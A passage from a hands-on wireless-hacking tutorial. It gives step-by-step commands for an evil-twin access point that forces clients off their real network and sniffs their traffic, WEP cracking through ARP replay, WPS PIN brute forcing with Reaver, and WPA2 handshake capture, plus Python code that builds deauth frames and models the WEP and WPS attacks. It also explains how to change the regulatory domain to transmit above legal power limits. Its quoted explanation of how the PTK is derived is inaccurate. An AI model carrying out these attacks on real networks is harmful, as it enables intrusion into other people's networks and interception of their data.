To start monitor mode on a wireless interface (say wlan0):

airmon-ng start wlan0

To capture packets from the air on the monitor-mode interface (mon0):

airodump-ng mon0

After about 30-40 seconds, press Ctrl+C and leave the terminal as is. Open a new terminal.

Creating the twin

Now we use airbase-ng to create the twin of one of the networks that showed up in the airodump-ng list. Remember, you need a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Once you have selected the network, note its ESSID, BSSID and channel and put them into:

airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>

If you face any problems, a shorter form is:

airbase-ng --essid <name of network> mon0

Remove the angle brackets (< and >) and choose any channel you want. The BSSID can also be chosen at random and doesn't have to match the target, and the interface is mon0 (or whatever card you want to use). The only thing the twins must have in common is the ESSID (the name of the network). However, it is better to keep all parameters the same to make it look more real. One caveat: a client that has saved the real network with WPA/WPA2 security treats an open network of the same name as a different network, so not every client will join an open twin automatically.

After you have entered the parameters and run the command, you'll see that airbase-ng has turned your wireless adapter into an access point.

Note: We will need to provide internet access to our client at a later stage. Make sure you have a way of connecting to the net other than this wireless card, because it will be busy acting as an AP and won't be able to provide you with connectivity. So you need either another card or broadband/ADSL/3G/4G/2G internet.

(Man-in-the-middle attack diagram; pic credits: owasp.net)

Telling the client to get lost

Now we have to make the client disconnect from the real AP. Our twin won't work while the client is connected to the other network, so we need to force it to disconnect from the real network and then connect to the twin. For the first part, aireplay-ng will do it for us:

aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

The 0 after --deauth is the number of deauthentication bursts to send: 0 means keep sending them until you stop it, 1 means send one burst, 5 means five, and so on. If you keep it at 0, your client is disconnected within a matter of seconds, so fire up the command and press Ctrl+C after a few seconds. Note that the deauth is sent to the broadcast address, so all clients connected to the network (not just one) will disconnect. Disconnecting a specific client is also possible, by adding -c <client MAC>.

Not the real one, but why the fake one

Even after being disconnected from the real AP, the client may keep trying to reconnect to the same AP a few more times instead of trying ours. We need to make our AP stand out, and for that we need more signal strength. There are two ways to do that:

1. Physically move closer to the client.
2. Tell your wireless card to transmit at higher power:

iwconfig wlan0 txpower 27

Here 27 is the transmit power in dBm. Some cards can't transmit at high power, and some can transmit at very high power. Alfa cards usually support up to 30 dBm, but many countries don't allow a card to transmit at such power; try changing 27 to 30 and you'll see what I mean. Bolivia's regulatory domain does allow 30 dBm, so by changing the regulatory domain we can lift the limitation:

iw reg set BO
iwconfig wlan0 txpower 30

It is strongly advised not to break the law: the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal is stronger than the real twin's.

Note: If you are unable to get the client to connect to you, there is another option: leave him with no choice. If you keep transmitting deauth packets continuously (i.e. don't press Ctrl+C after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.
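To show what aireplay-ng is actually putting on the air, here is an added example (not code from the original tutorial, and not aireplay-ng's own code) that builds a raw 802.11 deauthentication frame with the standard library, decodes it again, and works out which clients are hit depending on whether the receiver address is broadcast or a single client. The MAC addresses are constructed, and reason code 7 is an assumption (it is a common choice for these frames, not something the tutorial states).

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_FROM_NONASSOC_STA = 7  # reason code commonly used by deauth tools (assumed here)


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid: str, target: str = BROADCAST,
                 reason: int = REASON_CLASS3_FROM_NONASSOC_STA, seq: int = 0) -> bytes:
    """Build a raw 802.11 deauthentication frame (no radiotap header).

    Frame control: protocol version 0, type 0 (management), subtype 12
    (deauthentication), so the first byte is 0xC0. Addresses: addr1 is the
    receiver, addr2 the transmitter, addr3 the BSSID. We claim to be the AP
    (addr2 = BSSID); that is all the spoofing needed, because management
    frames are not authenticated in plain WPA/WPA2 without 802.11w.
    """
    frame_control = (12 << 4) | (0 << 2) | 0  # subtype 12, type 0, version 0
    duration = 0
    header = struct.pack("<HH", frame_control, duration)
    header += mac_to_bytes(target) + mac_to_bytes(bssid) + mac_to_bytes(bssid)
    header += struct.pack("<H", (seq & 0xFFF) << 4)  # sequence control: seq<<4, fragment 0
    body = struct.pack("<H", reason)
    return header + body


def parse_deauth(frame: bytes) -> dict:
    """Decode the fields we care about and check that it really is a deauth frame."""
    frame_control, _duration = struct.unpack_from("<HH", frame, 0)
    subtype = (frame_control >> 4) & 0xF
    ftype = (frame_control >> 2) & 0x3
    if ftype != 0 or subtype != 12:
        raise ValueError("not a deauthentication frame")
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {
        "receiver": bytes_to_mac(addr1),
        "transmitter": bytes_to_mac(addr2),
        "bssid": bytes_to_mac(addr3),
        "reason": reason,
    }


def affected_clients(frame: bytes, associated_clients: list) -> list:
    """Which of the AP's clients will act on this frame?

    A broadcast receiver address hits every associated client (the default
    --deauth behaviour); a unicast one hits only that client (the -c option).
    """
    info = parse_deauth(frame)
    if info["receiver"] == BROADCAST:
        return list(associated_clients)
    return [c for c in associated_clients if c == info["receiver"]]


if __name__ == "__main__":
    # Constructed example values, not a real network.
    ap = "00:11:22:33:44:55"
    clients = ["aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02", "aa:bb:cc:dd:ee:03"]
    print(build_deauth(ap).hex())
    print(affected_clients(build_deauth(ap), clients))
    print(affected_clients(build_deauth(ap, target=clients[1]), clients))
```

The 26-byte frame that comes out is the same thing aireplay-ng transmits (minus the radiotap header the driver adds); the only reason it works is that nothing in the frame proves it came from the real AP.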
Give the fake AP internet access

Now we need to provide internet access to the fake AP. This can be done in various ways; in this tutorial we assume we have an interface x0 that has internet connectivity. If you are connected to the net via wireless, replace x0 with wlan1 or wlan0; a 3G modem shows up as ppp0. You just have to know which interface provides your internet access, and you can route it to your client.

Interfaces

x0 - This has internet access.
at0 - This is created by airbase-ng (the wired face of the wireless access point). If you can give internet access to at0, the clients connected to your fake wireless network can reach the net.
evil - This is an interface we will create, whose job is to actually bridge the two networks.

Creating evil

We use the bridge control utility provided by Kali, brctl. Execute:

brctl addbr evil

This creates the bridge. Now specify which two interfaces are to be bridged:

brctl addif evil x0
brctl addif evil at0

Clear the addresses of the member interfaces and bring them up (a bridge port should not carry its own IP):

ifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up

Also bring up the evil interface (interfaces aren't always up by default, so we have to do this a lot):

ifconfig evil up

Now, to auto-configure all the complicated DHCP settings, run a DHCP client on the bridge (the binary was called dhclient3 on older Kali releases; on current ones it is simply dhclient):

dhclient3 evil &

Caveat: bridging like this works when x0 is an Ethernet-style interface. A wireless client interface or a PPP link (ppp0) generally cannot be added to a bridge; for those you have to route instead (NAT with iptables, plus a DHCP server such as dnsmasq on at0).

Finally, all the configuration is done. Run ifconfig and you will see all the interfaces you have created. Officially, the evil twin attack is complete: the client is now connected to your fake network and can use the internet pretty easily, with no obvious way to find out what went wrong. However, the last objective remains.

Have fun

Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually falls under man-in-the-middle (MITM) attacks, and I'll write a detailed tutorial on it later. For the time being, some idea of what you can do:

Sniffing using Wireshark

All the packets that go from the user to the internet pass through our evil interface, so they can be monitored with Wireshark (capture on the evil bridge interface). I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea of how to use Wireshark:
http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html
(Pic credits: the picture on the right is taken directly from their website.)

Lesson 15: Ad-Hoc Networks (Pentesting yourself the legal way)

Create a Wireless Ad-Hoc Network on Windows 8 Using the Command Line

For the hackers

This method works on every version of Windows that has the hosted network feature (Windows 7 and later). This article is relevant here because the best way to start with hacking is to practice on yourself. You are going to need two adapters for this: one on Windows, which creates the network, and another on Kali Linux, which attacks the network. This article covers only the former part, creating the network, so non-hackers can follow along too.

For everyone

1. Open an elevated command prompt (with administrator privileges). On Windows 8: press Windows key + X, or hover the mouse in the lower-left corner of the screen and right-click, then click "Command Prompt (Admin)".
2. Type
netsh wlan show drivers
3. If "Hosted network supported" says Yes, move on to the next step.
4. Type
netsh wlan set hostednetwork mode=allow ssid=<enter_network_name_here> key=<enter_password_here>
5. Finally type
netsh wlan start hostednetwork

Your network is ready. (A hosted network always uses WPA2-PSK, and the key must be 8 to 63 characters long.)

Lesson 16: Creating a dummy Wi-Fi network for pentesting

Creating a dummy wifi for hacking

What you'll need

At least 2 wireless adapters. I've got three: the internal adapter that came with my laptop, and two D-Link USB adapters. This is what it looks like.
(My D-Link adapter.) This is what it looks like on my Windows machine (I blurred the names a bit; it's a sort of convention, I guess).

What now

Since we have multiple adapters, we can use one of them to create a wireless network on Windows and then practice hacking it from a virtual Kali Linux machine. (Screenshot: our newly created network.) Now turn on the Kali machine and see whether it is discovered there. It showed up fine. We can use netsh to modify the network name and key as necessary and practice our hacking skills on our dummy wifi network. Keep in mind that a Windows hosted network is always WPA2-PSK; to practice against WEP or WPA-TKIP you need a real router or a second AP you control.

Lesson 17: Speeding up WEP Hacking in Kali Linux

Speeding Up WEP Hacking In Kali

If you have followed the basic WEP hacking tutorial, you are ready to move on to an intermediate-level tutorial. Here we look at the intricate details of what is happening and approach the more complicated methods and concepts. To start with, I'll address a common question, asked in a comment:

14 March 2014 19:28
I couldn't find any wlan when I write ifconfig in terminal.

1. Are you using Kali Linux on a virtual machine? Please note that a wireless adapter can be used by only one machine at a time. Your host machine has access to the wireless adapter, not the virtual machine. This question has been discussed at length on the superuser forums. The conclusion is that you can't directly connect an internal wifi card to any virtual machine software:

"Unfortunately no virtualization software allows for direct access to hardware devices like that. Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. The only devices that can be directly accessed are USB devices. Everything else is abstracted through the virtualization engine. (Though you could argue that the VM has lower-level access to CD-ROMs and storage devices.) I wish I could give you a better answer than simply to buy a USB wireless card."
Basically you have to buy an external wireless card. They aren't very expensive; I personally use two of them. If you want to see what I use, take a look here: http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html

So you have two choices. First, buy an external wireless adapter (no referral links here). Second, install Kali alongside Windows or run it from USB. A virtual machine can only use hardware that is externally connected via USB and passed through to the guest.

There is another catch. Almost all internal adapters don't support packet injection, which is extremely important for speeding up wireless hacking. So if you really want to go in depth on wireless hacking, it's time to buy an external adapter or two (the more the better). If that's not a possibility, you might spend hours trying to find a driver that makes your internal adapter support injection (I don't know anyone who succeeded, but it might be possible).

Kali Linux

I don't know why it needs mention here, but if you don't have Kali Linux (or BackTrack) installed yet, you will have to install it before you can start this tutorial.

Check Injection Support

Aircrack-ng has a comprehensive article on checking injection support; check their website for it. Here I'm just providing the commands that are enough to find out whether injection is working:

airmon-ng start wlan0
(or wlan1; this puts your wireless adapter in monitor mode. From now on we'll refer to the monitor interface created from wlan0/wlan1 as mon0)

airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666

The first of these two commands sets up a temporary server (airserv-ng) on the card that waits for you to test your injection capabilities; the second connects to that server and runs the injection test. 127.0.0.1 is the loopback address, used whenever you run something against your own machine, and 666 is the port airserv-ng listens on by default. Most of the time, what follows an IP and a colon is the port; the general form is IP:port. (Running aireplay-ng -9 mon0 directly, without airserv-ng, tests the same thing.)

So now you have checked your injection capabilities, and the last line, "Injection is working!", should bring a smile to your face. If not, you'll have to buy a card that supports injection, or look for forum posts that help you figure something out.

Check Signal Strength

While the basic hacking method from the previous post doesn't have any real signal-strength restriction, you need to be physically close to the access point in order to inject packets. There is information on this in the same aircrack-ng tutorial; again, I'll summarize what you have to do.

First, use airodump-ng mon0 to see the list of networks in range, and pick the one you want to hack. (Screenshot: airodump-ng lists the networks in range.) We will hack the DIGISOL network. Make a note of the BSSID of the network you want to hack. A good practice is to store all the information gathered in a text editor. At this stage we note the following:

ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH (channel) - 2
MAC addresses of genuine users connected to the network
Interface: wlan1 - referred to as mon0

Gather the equivalent information for the network you will be working on, then substitute your values whenever I use mine in a command.

Note: We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet, and if there are no active clients there will never be any ARP request packets.

Now, to check whether the signal strength is sufficient, lock the card to the target's channel:

airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2

This makes the wireless card read packets only on channel 2, where our target network is. Now test the network:

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0

Last time we checked whether the wireless card could inject packets at all, testing against our own computer. This time we actually inject packets toward the target AP. If this worked, it's pretty good news: you are most probably going to be able to hack this network. The last line, 30/30: 100%, tells you how good the link quality is. A high percentage is a good sign, and 100 is ideal.

Capture Packets

We have already run airodump-ng a couple of times. This time we pass -w, which instructs airodump-ng to save the capture to a file:

airodump-ng -c [channel] --bssid [bssid] -w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0

The output is saved in the file dump-01.cap. Keep this terminal running and it will keep saving packets. [In the previous tutorial we did only two things: capture packets (this step) and crack them (the step we'll do last). Following just two steps makes our work easier, but it also makes the process much more time-consuming, since we are simply a passive listener who is not doing anything.]

Speeding Things Up

Fake Authentication

To speed things up, we will inject into the network and thus obtain ARP packets. These packets fill up the #Data column of our airodump-ng capture, and each data packet carries a fresh WEP initialization vector (IV); those IVs are what lets aircrack-ng recover the key. Once we have tens of thousands of data packets (the aircrack-ng guide suggests roughly 40,000 to 85,000 for the PTW attack, though it often succeeds with fewer), we can start attempting to get the key with aircrack-ng.

To make the AP pay attention to your injected packets, you either have to be a connected client or pretend to be one. You can either change your MAC address to that of an already connected client, or use the fake authentication feature. We will do the latter.
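To see why a replayed ARP packet produces "data" the cracker can use, here is an added example (not code from the original tutorial, nor from aircrack-ng) of WEP's encryption: RC4 keyed with a 24-bit IV prepended to the secret key, a CRC-32 integrity check value, and a model of what the AP does when we replay one captured ARP request, namely relay it again under a fresh IV. It also shows the other side of the coin: when two packets do share an IV, XORing the ciphertexts cancels the keystream and leaks the XOR of the plaintexts. The key, IVs and packet contents are constructed values.

```python
import os
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP keys RC4 with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP data body: IV(3) || key-index byte || RC4(IV || key, plaintext || CRC-32 ICV).

    The IV travels in the clear, which is exactly what airodump-ng counts in
    the #Data column: every data frame hands the attacker one more IV.
    """
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + b"\x00" + rc4(iv + secret_key, plaintext + icv)


def wep_decrypt(secret_key: bytes, body: bytes) -> bytes:
    """Reverse of wep_encrypt; raises if the ICV does not check out."""
    iv, payload = body[:3], body[4:]
    clear = rc4(iv + secret_key, payload)
    plaintext, icv = clear[:-4], clear[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def arp_replay(secret_key: bytes, captured_body: bytes, count: int) -> list:
    """Model of the AP's side of aireplay-ng -3 (constructed, not real 802.11):

    A replayed ARP request is a perfectly valid frame, so the AP relays it
    every time, encrypting each copy under a new IV. One captured packet
    therefore turns into `count` fresh IVs for the attacker, without any
    knowledge of the key on the attacker's side (the key is only used here
    to play the AP's role).
    """
    plaintext = wep_decrypt(secret_key, captured_body)
    return [wep_encrypt(secret_key, os.urandom(3), plaintext) for _ in range(count)]


def keystream_leak(body_a: bytes, body_b: bytes) -> bytes:
    """Two packets under the same IV: ciphertext XOR == plaintext XOR.

    With only 2^24 IVs, repeats are inevitable on a busy network; this is one
    of the reasons collecting many IVs breaks WEP.
    """
    if body_a[:3] != body_b[:3]:
        raise ValueError("different IVs: keystreams differ, nothing cancels")
    return bytes(x ^ y for x, y in zip(body_a[4:], body_b[4:]))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"  # constructed 40-bit WEP key
    arp = wep_encrypt(key, b"\x00\x00\x01", b"ARP request (constructed)")
    copies = arp_replay(key, arp, 5)
    print("IVs obtained from one replayed packet:", [c[:3].hex() for c in copies])
```

Every copy produced by arp_replay decrypts to the same ARP request but carries a different IV, which is precisely the "data" that piles up once aireplay-ng -3 gets going.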
(If you see an error like "the AP is on channel x and mon0 is on channel y", go to the bottom of the post for troubleshooting.)

aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0

(-1 selects fake authentication; the 0 is the re-authentication delay in seconds, 0 meaning authenticate once.) Screenshot: authenticated and capturing packets.

ARP request replay mode

ARP packets are your best bet for getting a lot of IVs (data). Without IVs you can't crack the network. The following makes aireplay-ng listen to the AP for ARP packets and re-inject each one as soon as it sees it; the AP relays every replayed packet under a new IV, which creates a lot of data very fast. This is the real speeding step:

aireplay-ng -3 -b [BSSID] mon0

The final command looks like this:

aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0

(Screenshot of the start.) You'll have to wait some time until it gets an ARP request. As soon as it gets one, the terminal will sort of explode, and the data packets start filling in at Godspeed. This is the part where an active user on the network is absolutely necessary.

(Screenshots: slow start; everything fine after some time; after a while, enough packets to crack almost any network; the data filled in VERY fast. The video shows how fast the IVs flowed in after ARP injection started.)

Cracking the network

Cracking the network is as easy as typing the following into the console:

aircrack-ng name_of_file-01.cap

In our case:

aircrack-ng dump-01.cap

After pressing enter you get a list of networks and are prompted to select which one of them to crack. In my case there was just one network, so I never got that screen, or a screenshot. The key was cracked in less than a second (I have blurred out the key and some random stuff). So finally you have obtained the key of the network you were trying to hack.

Troubleshooting

A person commented on another wireless hacking post. This is the problem he faced:

"whenever I try to use aireplay-ng, with the options, it always fails saying that mon0 is in channel -1 and the target is in another channel. How can I fix this? I looked a lot for a real answer but nobody knows what this is."

This is a possible solution. Try the following:

1) When you start monitor mode, specify the channel:

airmon-ng start <interface> [channel or frequency]

Your command: airmon-ng start wlan0 6
Substitute 6 with the required channel.

2) While starting airodump-ng, specify the channel:

airodump-ng mon0 -c 6

I was facing this problem when my mon0 kept hopping from one channel to another, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel of its own accord, without you even specifying it, the problem might be more complicated. If the above steps don't solve it, take a look here: http://ubuntuforums.org/showthread.php?t=1598930

Lesson 18: Hack WPA/WPA2 with WPS enabled

Hack WPA/WPA2 WPS - Reaver - Kali Linux

WPA/WPA2

When it became known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy-peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure: WPA/WPA2. Hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days and still not succeed, and good dictionaries are huge. An exhaustive brute force over all letters (upper and lower case) and digits may take years, depending on the password length. Rainbow tables speed things up by doing part of the guessing job beforehand, but the table that has to be downloaded is disastrously large (hundreds of GB sometimes), and because WPA mixes the SSID into the key derivation, a table only helps for the SSIDs it was precomputed for. And finally the security folks were at peace.

But it was not over yet. The new WPA technology was not at all easy for users to configure, so a new measure was introduced to complement WPA: Wi-Fi Protected Setup (WPS). It was never meant to make WPA harder to crack, only much easier to configure (push a button on the router and the device connects) without giving anything away.
However, it had a hole, which is now well known, and tools like Reaver can exploit it with a single command. It still might take hours, but that is much better than the previous scenario in which months of brute-forcing would yield no result. Here's what Wikipedia says about WPS:

"Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 preshared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models."

Working of WPS

While most things are the same as in WPA, there is a new concept of using PINs for authentication. Basically, the client sends an 8-digit PIN to the access point, which verifies it and then hands over the network's WPA credentials so the client can connect. A PIN has 8 digits and contains only numbers, so it is a possible target for brute force. With normal brute-forcing of WPA passwords you have to consider that there may be numbers, letters and sometimes symbols (and more than 8 characters), which makes the task a billion billion times tougher; on the other hand, against a captured handshake we can try thousands of keys per second offline, which makes it a tad easier. With WPS there is a delay because we have to wait for the AP's response, and we can only try a few PINs per second (practically the best I've seen on my PC is one PIN every 2 seconds).

Basically, 8 digits with 10 possibilities each (0-9) make 10^8 PINs (interpret ^ as "raised to the power of"), i.e. 10^8 seconds if we assume one PIN per second. That's about three years. So where is this taking us? The answer is that there are flaws in this technology that can be used against it.

1. The 8th digit is a checksum of the first 7 digits, so there are only 10^7 real possibilities: one-tenth of the time. Nearly four months; still a way to go.
2. The PIN is verified in two halves, so we can independently verify the first four and the last four digits. And believe me, it's easier to guess 4 digits correctly twice than 8 digits correctly at once. The first half takes at most 10^4 guesses, and the second half at most 10^3 (its last digit is the checksum, so only three digits are free). The guesses add up: 10^4 + 10^3 (not 10^4 * 10^3). So we need at most 11,000 guesses, about 3 hours at one PIN per second. That's for all the combinations; most probably the correct PIN will not be the last one tried, so you can expect to reach the result earlier. However, the assumption is that brute-forcing proceeds at one PIN per second. My personal best is one every 2 seconds, and yours might drop as low as one every 10 seconds.

How to carry out the attack

It might have been tough to carry out this attack at some point in history, but now it's a breeze. If you have all the prerequisites, hacking the network is as easy as

reaver -i <interface-name> -b <BSSID of target>

If you are already familiar with hacking WEP, just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 minutes later, check the progress (it must be 1% or something), and go take a nap. However, if you're a newbie, tag along.

Kali Linux

First off, you need Kali Linux (or BackTrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own.
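Here is an added example (not code from the original tutorial, nor from Reaver) that puts numbers on the two flaws above: it computes the WPS PIN checksum digit, models a registrar that, like a real AP, answers the first half and the second half of the PIN separately, and runs the split brute force against it while counting attempts. The registrar class is a constructed stand-in for the message exchange, not a WPS implementation; the secret PINs are made up.

```python
def wps_checksum(first7: str) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven digits,
    then whatever makes the weighted sum a multiple of 10."""
    acc = 0
    for i, ch in enumerate(first7):
        d = int(ch)
        acc += 3 * d if i % 2 == 0 else d
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class WpsRegistrar:
    """Constructed stand-in for the AP's WPS registrar.

    In the real exchange the AP reveals after message M4 whether the first
    half of the PIN was right, and after M6 whether the second half was.
    That split is the whole weakness; this class exposes it directly and
    counts how many attempts the attacker needed.
    """

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("secret PIN must be a valid 8-digit WPS PIN")
        self._pin = pin
        self.attempts = 0

    def try_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[:4]

    def try_second_half(self, first: str, second: str) -> bool:
        self.attempts += 1
        return first == self._pin[:4] and second == self._pin[4:]


def crack_pin(ap: WpsRegistrar) -> str:
    """The Reaver strategy: 10^4 tries for the first half, then 10^3 for the
    second half because its fourth digit is forced by the checksum."""
    first = next(f"{i:04d}" for i in range(10_000) if ap.try_first_half(f"{i:04d}"))
    for j in range(1_000):
        tail = f"{j:03d}"
        tail += str(wps_checksum(first + tail))
        if ap.try_second_half(first, tail):
            return first + tail
    raise RuntimeError("no PIN found (AP does not follow the split or checksum rule)")


def worst_case_hours(seconds_per_attempt: float) -> float:
    """10^4 + 10^3 attempts, not 10^8, at the given rate."""
    return (10_000 + 1_000) * seconds_per_attempt / 3600


if __name__ == "__main__":
    ap = WpsRegistrar("12345670")  # the PIN from the screenshot later in this lesson
    print("recovered:", crack_pin(ap), "after", ap.attempts, "attempts")
    print("worst case at 1/s: %.1f h, at 1 per 2 s: %.1f h" %
          (worst_case_hours(1.0), worst_case_hours(2.0)))
```

Against the secret 12345670 the split attack needs 1,803 attempts; the worst possible PIN costs exactly 11,000, which is where the "about 3 hours at one PIN per second" figure comes from.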
(Reaver has a known issue : Sometimes it doesn't work with Virtual Machines, and you might have to do a live boot using live CD or live USB of Kali Linux. See the last section of this post on = troubleshooting by scrolling down a bit) Information Gathering Now you need to find out the following about you target networkDoes it have WPS enabled. If not, then the attack will not work. The BSSID of the network. Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the stepsSet your wireless interface in monitor modeairmon-ng start wlan0 Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled. wash -i mon0 This will show all the networks with WPS enabled This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move on to airodump method. Update : wash -i mon0 --ignore-fcs might solves the issue. Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps. airodump-ng mon0 None of them has WPS enabled, just saying. BSSID of the network - Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need. So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it. Reaver Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enterreaver -i mon0 -b XX:XX:XX:XX:XX:XX Explanation = i - interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. 
-b species the BSSID of the network that we found out earlier. This is all the information that Reaver need to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting. So final command should bereaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was hacked in 3 seconds. Here is an extra section, which might prove useful (or more like consoling, to let you know you are not the only one who is having troubles) Known problems that are faced - Troubleshooting 1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6". (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever. 2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage. 3. Sometimes it never associates with the target AP. 4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed. In most cases, such errors suggest1. Something wrong with wireless card. 2. AP is very choosy, won't let you associate. 3. The AP does not use WPS. 4. You are very far from the AP. Possible workarounds1. Sometimes, killing naughty processes helps. (see pictures below) 2. Move closer to target AP 3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code) 4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. 
In my case, booting up from USB and using the internal adapter increased the signal strength and sped up the bruteforce process. Update: It has nothing to do with the internal adapter. I have verified my observation with various hackers, and it is now a known problem with Reaver. It does not work well inside virtual machines. It is recommended that you do a live boot.

(Screenshots: processes causing problems; kill 'em all.)

Lesson 19: Hack WPA-2 PSK Capture Handshake

Hack WPA-2 PSK: Capturing the Handshake

WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps:
1. Getting a handshake (it contains the hash of the password, i.e. the encrypted password).
2. Cracking the hash.

Now the first step is conceptually easy. What you need is you (the attacker), a client who'll connect to the wireless network, and the wireless access point. What happens is, when the client and access point communicate in order to authenticate the client, they have a 4-way handshake that we can capture. This handshake has the hash of the password. Now there's no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exist, and convert them to hashes. Then we'll match the hash we created with the one that's there in the handshake. If the hashes match, we know what plain text password gave rise to the hash, and thus we know the password. If the process sounds really time consuming to you, then it's because it is. WPA hacking (and hash cracking in general) is a pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I'll face the problems for you). Also, before that, some optional Wikipedia theory on what a 4-way handshake really is (you don't want to become a script kiddie, do you?).
The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function. The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic.

The actual messages exchanged during the handshake are depicted in the figure and explained below:
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
